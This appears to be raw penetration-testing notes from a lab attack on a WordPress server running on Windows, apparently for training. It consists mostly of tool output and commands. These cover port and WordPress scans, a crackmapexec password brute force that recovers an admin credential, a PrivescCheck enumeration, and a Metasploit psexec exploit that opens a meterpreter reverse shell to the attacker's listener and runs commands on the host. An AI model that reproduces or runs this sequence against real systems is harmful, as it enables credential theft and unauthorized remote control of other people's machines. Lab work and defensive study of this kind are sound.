🌐Wordpress
IP: 192.168.100.50
IP: 192.168.100.50
Nmap Scans
Nmap scan report for ip-192-168-100-50.ap-south-1.compute.internal (192.168.100.50)
Host is up (0.00063s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Win64) PHP/7.4.26)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3307/tcp open opsession-prxy?
3389/tcp open ssl/ms-wbt-server?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49178/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
SF-Port3307-TCP:V=7.92%I=7%D=3/24%Time=641DD6E7%P=x86_64-pc-linux-gnu%r(NU
SF:LL,6B,"g\\0\\0\\x01\\xffj\\x04Host\\x20'ip-192-168-100-5\\.ap-south-1\\.compute
SF:\\.internal'\\x20is\\x20not\\x20allowed\\x20to\\x20connect\\x20to\\x20this\\x20M
SF:ariaDB\\x20server");
MAC Address: 02:8D:D6:7A:B4:22 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsWhat is the name of the active theme on the WordPress site?http://192.168.100.50/home
Spintech or Burgertheme
SMB Enumeration.
SMB VersioN
RDP Enumeration.
WinRM Credentials. Initial Foothold
root@kali:~# crackmapexec winrm 192.168.100.50 -u /usr/share/wordlists/metasploit/unix_users.txt -p /usr/share/wordlists/metasploit/unix_passwords.txt
WINRM 192.168.100.50 5985 NONE [+] None\admin:superman (Pwn3d!)Directory Enumeration.
192.168.100.50/phpmyadmin/ —> PHPMyadmin Login page.
WPScan Results.
root@kali:~# wpscan --url <http://wordpress.local> -e - ap, at, vt
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: <http://wordpress.local/> [192.168.100.50]
[+] Started: Sat Mar 25 07:19:11 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.51 (Win64) PHP/7.4.26
| - X-Powered-By: PHP/7.4.26
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://wordpress.local/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://wordpress.local/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: <http://wordpress.local/wp-content/uploads/>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://wordpress.local/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.9.3 identified (Latest, released on 2022-04-05).
| Found By: Emoji Settings (Passive Detection)
| - <http://wordpress.local/>, Match: 'wp-includes\\/js\\/wp-emoji-release.min.js?ver=5.9.3'
| Confirmed By: Meta Generator (Passive Detection)
| - <http://wordpress.local/>, Match: 'WordPress 5.9.3'
[+] WordPress theme in use: spintech
| Location: <http://wordpress.local/wp-content/themes/spintech/>
| Latest Version: 1.0.33 (up to date)
| Last Updated: 2022-03-28T00:00:00.000Z
| Readme: <http://wordpress.local/wp-content/themes/spintech/readme.txt>
| Style URL: <http://wordpress.local/wp-content/themes/spintech/style.css?ver=5.9.3>
| Style Name: Spintech
| Style URI: <https://burgerthemes.com/spintech-free/>
| Description: Spintech WordPress theme is specially designed for an IT & Software Company. Theme is perfectly for ...
| Author: burgersoftware
| Author URI: <https://burgerthemes.com/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.33 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://wordpress.local/wp-content/themes/spintech/style.css?ver=5.9.3>, Match: 'Version: 1.0.33'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:13 <=============================================================================================================> (468 / 468) 100.00% Time: 00:00:13
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:08 <===========================================================================================================> (2575 / 2575) 100.00% Time: 00:00:08
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:02 <==============================================================================================================> (137 / 137) 100.00% Time: 00:00:02
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <====================================================================================================================> (68 / 68) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:02 <=========================================================================================================> (100 / 100) 100.00% Time: 00:00:02
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===============================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Sat Mar 25 07:20:22 2023
[+] Requests Done: 3873
[+] Cached Requests: 9
[+] Data Sent: 1.061 MB
[+] Data Received: 1.162 MB
[+] Memory used: 274.82 MB
[+] Elapsed time: 00:01:11Post Exploitation
Local Users Enumeration.
PrivEscCheck
C:\\temp>powershell -ep bypass -c ". .\\pecheck.ps1; Invoke-PrivescCheck"
powershell -ep bypass -c ". .\\pecheck.ps1; Invoke-PrivescCheck"
+------+------------------------------------------------+------+
| TEST | USER > Identity | INFO |
+------+------------------------------------------------+------+
| DESC | Get the full name of the current user (domain + |
| | username) along with the associated Security |
| | Identifier (SID). |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Name : WINSERVER-01\\admin
SID : S-1-5-21-2202681729-75510020-2229350343-1011
IntegrityLevel : Medium Mandatory Level (S-1-16-8192)
SessionId : 2
TokenId : 00000000-0015dd5e
AuthenticationId : 00000000-00094f83
OriginId : 00000000-000003e7
ModifiedId : 00000000-0015c100
Source : User32 (00000000-00094f48)
+------+------------------------------------------------+------+
| TEST | USER > Groups | INFO |
+------+------------------------------------------------+------+
| DESC | List all the groups that are associated to the |
| | current user's token. |
+------+-------------------------------------------------------+
[*] Found 14 result(s).
Name Type SI
D
---- ---- --
WINSERVER-01\\None Group S-
Everyone WellKnownGroup S-
NT AUTHORITY\\Local account and member of Administrators group WellKnownGroup S-
BUILTIN\\Administrators Alias S-
BUILTIN\\Users Alias S-
NT AUTHORITY\\REMOTE INTERACTIVE LOGON WellKnownGroup S-
NT AUTHORITY\\INTERACTIVE WellKnownGroup S-
NT AUTHORITY\\Authenticated Users WellKnownGroup S-
NT AUTHORITY\\This Organization WellKnownGroup S-
NT AUTHORITY\\Local account WellKnownGroup S-
S-
LOCAL WellKnownGroup S-
NT AUTHORITY\\NTLM Authentication WellKnownGroup S-
Mandatory Label\\Medium Mandatory Level Label S-
+------+------------------------------------------------+------+
| TEST | USER > Privileges | INFO |
+------+------------------------------------------------+------+
| DESC | List the current user's privileges and identify the |
| | ones that can be leveraged for local privilege |
| | escalation. |
+------+-------------------------------------------------------+
[*] Found 5 result(s).
Name State Description Expl
oita
ble
---- ----- ----------- ----
SeShutdownPrivilege Enabled Shut down the system ...e
SeChangeNotifyPrivilege Enabled Bypass traverse checking ...e
SeUndockPrivilege Enabled Remove computer from docking station ...e
SeIncreaseWorkingSetPrivilege Enabled Increase a process working set ...e
SeTimeZonePrivilege Enabled Change the time zone ...e
+------+------------------------------------------------+------+
| TEST | USER > Environment Variables | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
| | and try to identify any potentially sensitive |
| | information such as passwords or API secrets. This |
| | check is simply based on keyword matching and might |
| | not be entirely reliable. |
+------+-------------------------------------------------------+
[!] Nothing found.
+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones |
| | that are built into Windows. It does so by parsing |
| | the target executable's metadata. |
+------+-------------------------------------------------------+
[*] Found 27 result(s).
Name : ALG
DisplayName : @C:\\Windows\\system32\\Alg.exe,-112
ImagePath : C:\\Windows\\System32\\alg.exe
User : NT AUTHORITY\\LocalService
StartMode : Manual
Name : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath : "C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe"
User : LocalSystem
StartMode : Automatic
Name : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath : "C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe"
User : LocalSystem
StartMode : Automatic
Name : cfn-hup
DisplayName : CloudFormation cfn-hup
ImagePath : "C:\\Program Files\\Amazon\\cfn-bootstrap\\winhup.exe"
User : LocalSystem
StartMode : Manual
Name : Ec2Config
DisplayName : Ec2Config
ImagePath : "C:\\Program Files\\Amazon\\Ec2ConfigService\\Ec2Config.exe"
User : LocalSystem
StartMode : Automatic
Name : EFS
DisplayName : @C:\\Windows\\system32\\efssvc.dll,-100
ImagePath : C:\\Windows\\System32\\lsass.exe
User : LocalSystem
StartMode : Manual
Name : GoogleChromeElevationService
DisplayName : Google Chrome Elevation Service (GoogleChromeElevationService)
ImagePath : "C:\\Program Files\\Google\\Chrome\\Application\\100.0.4896.127\\elevat
ion_service.exe"
User : LocalSystem
StartMode : Manual
Name : gupdate
DisplayName : Google Update Service (gupdate)
ImagePath : "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe" /svc
User : LocalSystem
StartMode : Automatic
Name : gupdatem
DisplayName : Google Update Service (gupdatem)
ImagePath : "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe" /medsvc
User : LocalSystem
StartMode : Manual
Name : HttpdService
DisplayName : Httpd Service
ImagePath : C:\\Users\\Administrator\\Downloads\\847d772037159c4559bd41a439489ee7
-minihttpd120\\minihttpd\\httpd.exe
User : LocalSystem
StartMode : Automatic
Name : IEEtwCollectorService
DisplayName : @C:\\Windows\\system32\\ieetwcollectorres.dll,-1000
ImagePath : C:\\Windows\\system32\\IEEtwCollector.exe /V
User : LocalSystem
StartMode : Manual
Name : KeyIso
DisplayName : @keyiso.dll,-100
ImagePath : C:\\Windows\\system32\\lsass.exe
User : LocalSystem
StartMode : Manual
Name : MSDTC
DisplayName : @comres.dll,-2797
ImagePath : C:\\Windows\\System32\\msdtc.exe
User : NT AUTHORITY\\NetworkService
StartMode : Automatic
Name : Netlogon
DisplayName : @C:\\Windows\\System32\\netlogon.dll,-102
ImagePath : C:\\Windows\\system32\\lsass.exe
User : LocalSystem
StartMode : Manual
Name : RpcLocator
DisplayName : @C:\\Windows\\system32\\Locator.exe,-2
ImagePath : C:\\Windows\\system32\\locator.exe
User : NT AUTHORITY\\NetworkService
StartMode : Manual
Name : SamSs
DisplayName : @C:\\Windows\\system32\\samsrv.dll,-1
ImagePath : C:\\Windows\\system32\\lsass.exe
User : LocalSystem
StartMode : Automatic
Name : SNMPTRAP
DisplayName : @C:\\Windows\\system32\\snmptrap.exe,-3
ImagePath : C:\\Windows\\System32\\snmptrap.exe
User : NT AUTHORITY\\LocalService
StartMode : Manual
Name : Spooler
DisplayName : @C:\\Windows\\system32\\spoolsv.exe,-1
ImagePath : C:\\Windows\\System32\\spoolsv.exe
User : LocalSystem
StartMode : Automatic
Name : sppsvc
DisplayName : @C:\\Windows\\system32\\sppsvc.exe,-101
ImagePath : C:\\Windows\\system32\\sppsvc.exe
User : NT AUTHORITY\\NetworkService
StartMode : Automatic
Name : TieringEngineService
DisplayName : @C:\\Windows\\system32\\TieringEngineService.exe,-702
ImagePath : C:\\Windows\\system32\\TieringEngineService.exe
User : localSystem
StartMode : Manual
Name : UI0Detect
DisplayName : @C:\\Windows\\system32\\ui0detect.exe,-101
ImagePath : C:\\Windows\\system32\\UI0Detect.exe
User : LocalSystem
StartMode : Manual
Name : VaultSvc
DisplayName : @C:\\Windows\\system32\\vaultsvc.dll,-1003
ImagePath : C:\\Windows\\system32\\lsass.exe
User : LocalSystem
StartMode : Manual
Name : vds
DisplayName : @C:\\Windows\\system32\\vds.exe,-100
ImagePath : C:\\Windows\\System32\\vds.exe
User : LocalSystem
StartMode : Manual
Name : VSS
DisplayName : @C:\\Windows\\system32\\vssvc.exe,-102
ImagePath : C:\\Windows\\system32\\vssvc.exe
User : LocalSystem
StartMode : Manual
Name : wampapache64
DisplayName : wampapache64
ImagePath : "c:\\wamp64\\bin\\apache\\apache2.4.51\\bin\\httpd.exe" -k runservice
User : LocalSystem
StartMode : Automatic
Name : wampmariadb64
DisplayName : wampmariadb64
ImagePath : "c:\\wamp64\\bin\\mariadb\\mariadb10.6.5\\bin\\mysqld.exe"
"wampmariadb64"
User : LocalSystem
StartMode : Automatic
Name : wmiApSrv
DisplayName : @C:\\Windows\\system32\\wbem\\wmiapsrv.exe,-110
ImagePath : C:\\Windows\\system32\\wbem\\WmiApSrv.exe
User : localSystem
StartMode : Manual
+------+------------------------------------------------+------+
| TEST | SERVICES > Service Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and |
| | check whether the current user can modify any |
| | registered service. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > Registry Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
| | can modify the configuration of any registered |
| | service. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user |
| | can modify the target executable or write files in |
| | its parent folder. |
+------+-------------------------------------------------------+
[*] Found 5 result(s).
Name : HttpdService
ImagePath : C:\\Users\\Administrator\\Downloads\\847d772037159c4559bd41a439
489ee7-minihttpd120\\minihttpd\\httpd.exe
User : LocalSystem
ModifiablePath : C:\\Users\\Administrator\\Downloads
IdentityReference : WINSERVER-01\\admin
Permissions : WriteOwner, Delete, WriteAttributes, Synchronize,
ReadControl, ListDirectory, AddSubdirectory,
WriteExtendedAttributes, WriteDAC, ReadAttributes,
AddFile, ReadExtendedAttributes, DeleteChild, Traverse
Status : Stopped
UserCanStart : False
UserCanStop : False
Name : wampapache64
ImagePath : "c:\\wamp64\\bin\\apache\\apache2.4.51\\bin\\httpd.exe" -k
runservice
User : LocalSystem
ModifiablePath : C:\\wamp64\\bin\\apache\\apache2.4.51\\bin
IdentityReference : BUILTIN\\Users
Permissions : AddSubdirectory
Status : Running
UserCanStart : False
UserCanStop : False
Name : wampapache64
ImagePath : "c:\\wamp64\\bin\\apache\\apache2.4.51\\bin\\httpd.exe" -k
runservice
User : LocalSystem
ModifiablePath : C:\\wamp64\\bin\\apache\\apache2.4.51\\bin
IdentityReference : BUILTIN\\Users
Permissions : AddFile
Status : Running
UserCanStart : False
UserCanStop : False
Name : wampmariadb64
ImagePath : "c:\\wamp64\\bin\\mariadb\\mariadb10.6.5\\bin\\mysqld.exe"
"wampmariadb64"
User : LocalSystem
ModifiablePath : C:\\wamp64\\bin\\mariadb\\mariadb10.6.5\\bin
IdentityReference : BUILTIN\\Users
Permissions : AddSubdirectory
Status : Running
UserCanStart : False
UserCanStop : False
Name : wampmariadb64
ImagePath : "c:\\wamp64\\bin\\mariadb\\mariadb10.6.5\\bin\\mysqld.exe"
"wampmariadb64"
User : LocalSystem
ModifiablePath : C:\\wamp64\\bin\\mariadb\\mariadb10.6.5\\bin
IdentityReference : BUILTIN\\Users
Permissions : AddFile
Status : Running
UserCanStart : False
UserCanStop : False
+------+------------------------------------------------+------+
| TEST | SERVICES > Unquoted Path | VULN |
+------+------------------------------------------------+------+
| DESC | List registered services and check whether any of |
| | them is configured with an unquoted path that can be |
| | exploited. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | SERVICES > SCM Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the current user can perform any |
| | privileged actions on the Service Control Manager |
| | (SCM). |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > SAM/SYSTEM/SECURITY Files | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the SAM/SYSTEM/SECURITY files are |
| | configured with weak permissions, allowing a |
| | low-privileged user to read them - HiveNightmare |
| | (CVE-2021-36934). |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > SAM/SYSTEM/SECURITY in shadow copies | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the SAM/SYSTEM/SECURITY files in shadow |
| | copies are configured with weak permissions, allowing |
| | a low-privileged user to read them. Can happen when |
| | HiveNightmare (CVE-2021-36934) mitigations have not |
| | been applied manually. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > Unattend Files | VULN |
+------+------------------------------------------------+------+
| DESC | Locate 'Unattend' files and check whether they |
| | contain any clear-text credentials. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > WinLogon | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the Winlogon registry keys and check whether |
| | they contain any clear-text password. Entries that |
| | have an empty password field are filtered out. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CREDS > GPP Passwords | VULN |
+------+------------------------------------------------+------+
| DESC | Locate old cached Group Policy Preference files that |
| | contain a 'cpassword' field and extract the |
| | clear-text credentials. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | HARDENING > Credential Guard | INFO |
+------+------------------------------------------------+------+
| DESC | Checks whether Credential Guard is supported and |
| | enabled. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Name : Credential Guard
DeviceGuardSecurityServicesConfigured : (null)
DeviceGuardSecurityServicesRunning : (null)
Description : Credential Guard is not supported on
this OS
Compliance : False
+------+------------------------------------------------+------+
| TEST | HARDENING > BitLocker | INFO |
+------+------------------------------------------------+------+
| DESC | Check whether BitLocker is configured and enabled on |
| | the system drive. Note that this check will yield a |
| | false positive if another encryption software is in |
| | use. |
+------+-------------------------------------------------------+
+------+------------------------------------------------+------+
| TEST | CONFIG > PATH Folder Permissions | VULN |
+------+------------------------------------------------+------+
| DESC | Retrieve the list of SYSTEM %PATH% folders and check |
| | whether the current user has some write permissions |
| | in any of them. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | MISC > Hijackable DLLs | INFO |
+------+------------------------------------------------+------+
| DESC | List Windows services that are prone to Ghost DLL |
| | hijacking. This is particularly relevant if the |
| | current user can create files in one of the SYSTEM |
| | %PATH% folders. |
+------+-------------------------------------------------------+
[*] Found 3 result(s).
Name : windowsperformancerecordercontrol.dll
Description : Loaded by DiagTrack upon service startup or shutdown
RunAs : LocalSystem
RebootRequired : True
Name : diagtrack_win.dll
Description : Loaded by DiagTrack upon service startup
RunAs : LocalSystem
RebootRequired : True
Name : wlanapi.dll
Description : Loaded by NetMan when listing network interfaces
RunAs : LocalSystem
RebootRequired : False
+------+------------------------------------------------+------+
| TEST | CONFIG > AlwaysInstallElevated | VULN |
+------+------------------------------------------------+------+
| DESC | Check whether the 'AlwaysInstallElevated' registry |
| | keys are configured and enabled. If so any user might |
| | be able to run arbitary MSI files with SYSTEM |
| | privileges. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > WSUS Configuration | VULN |
+------+------------------------------------------------+------+
| DESC | If WSUS is configured and enabled, check whether the |
| | service uses an insecure URL (http://*). If so, it |
| | might be vulnerable to MitM attacks. Note that in |
| | case of local exploitation, the value of |
| | 'SetProxyBehaviorForUpdateDetection' determines |
| | whether the service uses the system or user proxy |
| | settings. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > Hardened UNC Paths | VULN |
+------+------------------------------------------------+------+
| DESC | Check hardened UNC paths. If not properly configured, |
| | a Man-in-the-Middle might be able to run arbitrary |
| | code with SYSTEM privileges by injecting malicious |
| | group policies during a group policy update (SYSVOL |
| | only). |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > SCCM Cache Folder (info) | INFO |
+------+------------------------------------------------+------+
| DESC | Checks whether the SCCM cache folder exists. Manual |
| | investigation might be required during |
| | post-exploitation. |
+------+-------------------------------------------------------+
[!] Nothing found.
+------+------------------------------------------------+------+
| TEST | CONFIG > SCCM Cache Folder | VULN |
+------+------------------------------------------------+------+
| DESC | Checks whether the current user can browse the SCCM |
| | cache folder. If so, hardcoded credentials might be |
| | extracted from MSI package files or scripts. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > Point and Print | VULN |
+------+------------------------------------------------+------+
| DESC | Checks whether the Print Spooler service is enabled |
| | and if the Point and Print configuration allows |
| | low-privileged users to install printer drivers. |
+------+-------------------------------------------------------+
[!] Not vulnerable.
+------+------------------------------------------------+------+
| TEST | CONFIG > Driver Co-Installers | INFO |
+------+------------------------------------------------+------+
| DESC | Check whether the 'DisableCoInstallers' registry key |
| | is absent or disabled. If so any user might be able |
| | to run arbitrary code with SYSTEM privileges by |
| | plugging a device automatically installing vulnerable |
| | software along with its driver. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Key : HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Device Installer
Value : DisableCoInstallers
Data : (null)
Description : CoInstallers are enabled (default)
Compliance : False
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and |
| | check whether a patch was applied in the last 31 |
| | days. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB4503276 Security Update WINSERVER-01\\Administrator 2022-04-18 - 00:00:00
+------+------------------------------------------------+------+
| TEST | MISC > User session list | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the sessions of the currently logged-on |
| | users. It might be possible to capture or relay the |
| | NTLM/Kerberos authentication of these users |
| | (RemotePotato0, KrbRelay). |
+------+-------------------------------------------------------+
[*] Found 3 result(s).
SessionName UserName Id State
----------- -------- -- -----
Services 0 Disconnected
Console 1 Connected
RDP-Tcp#39 WINSERVER-01\\admin 2 Active
+-----------------------------------------------------------------------------+
| ~~~ PrivescCheck Report ~~~ |
+----+------+-----------------------------------------------------------------+
| OK | None | CONFIG > Hardened UNC Paths |
| NA | None | CONFIG > SCCM Cache Folder (info) |
| OK | None | CONFIG > PATH Folder Permissions |
| OK | None | CONFIG > WSUS Configuration |
| NA | None | CONFIG > Driver Co-Installers -> 1 result(s) |
| OK | None | CONFIG > AlwaysInstallElevated |
| OK | None | CONFIG > SCCM Cache Folder |
| OK | None | CONFIG > Point and Print |
| OK | None | CREDS > SAM/SYSTEM/SECURITY in shadow copies |
| OK | None | CREDS > GPP Passwords |
| OK | None | CREDS > Unattend Files |
| OK | None | CREDS > WinLogon |
| OK | None | CREDS > SAM/SYSTEM/SECURITY Files |
| NA | None | HARDENING > Credential Guard -> 1 result(s) |
| NA | None | MISC > Hijackable DLLs -> 3 result(s) |
| NA | None | MISC > User session list -> 3 result(s) |
| OK | None | SERVICES > Registry Permissions |
| OK | None | SERVICES > Service Permissions |
| NA | None | SERVICES > Non-default Services -> 27 result(s) |
| OK | None | SERVICES > SCM Permissions |
| OK | None | SERVICES > Unquoted Path |
| KO | High | SERVICES > Binary Permissions -> 5 result(s) |
| KO | Med. | UPDATES > System up to date? -> 1 result(s) |
| NA | None | USER > Identity -> 1 result(s) |
| NA | None | USER > Groups -> 14 result(s) |
| NA | None | USER > Environment Variables |
| NA | None | USER > Privileges -> 5 result(s) |
+----+------+-----------------------------------------------------------------+
WARNING: To get more info, run this script with the option '-Extended'.Getting shell via meterpreter using psexec
msf6 >
msf6 > search psexec
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/impacket/dcomexec 2018-03-19 normal No DCOM Exec
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/psexec_loggedin_users normal No Microsoft Windows Authenticated Logged In Users Enumeration
4 exploit/windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution
5 auxiliary/admin/smb/psexec_ntdsgrab normal No PsExec NTDS.dit And SYSTEM Hive Download Utility
6 exploit/windows/local/current_user_psexec 1999-01-01 excellent No PsExec via Current User Token
7 encoder/x86/service manual No Register Service
8 auxiliary/scanner/smb/impacket/wmiexec 2018-03-19 normal No WMI Exec
9 exploit/windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution
10 exploit/windows/local/wmi 1999-01-01 excellent No Windows Management Instrumentation (WMI) Remote Command Execution
Interact with a module by name or index. For example info 10, use 10 or use exploit/windows/local/wmi
msf6 > use 4
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.100.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > set SMBUser admin
SMBUser => admin
msf6 exploit(windows/smb/psexec) > set SMBPass superman
SMBPass => superman
msf6 exploit(windows/smb/psexec) > set RHOSTS 192.168.100.50
RHOSTS => 192.168.100.50
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 192.168.100.5:4444
[*] 192.168.100.50:445 - Connecting to the server...
[*] 192.168.100.50:445 - Authenticating to 192.168.100.50:445 as user 'admin'...
[*] 192.168.100.50:445 - Selecting PowerShell target
[*] 192.168.100.50:445 - Executing the payload...
[+] 192.168.100.50:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.100.50
[*] Meterpreter session 1 opened (192.168.100.5:4444 -> 192.168.100.50:63889 ) at 2024-08-19 07:11:28 +0530
meterpreter >
meterpreter >
meterpreter > shell
Process 2152 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 2:
Connection-specific DNS Suffix . : ap-south-1.compute.internal
Link-local IPv6 Address . . . . . : fe80::357a:c324:f4af:4fca%12
IPv4 Address. . . . . . . . . . . : 192.168.100.50
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.100.1
Tunnel adapter isatap.ap-south-1.compute.internal:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : ap-south-1.compute.internal
C:\Windows\system32>systeminfo
systeminfo
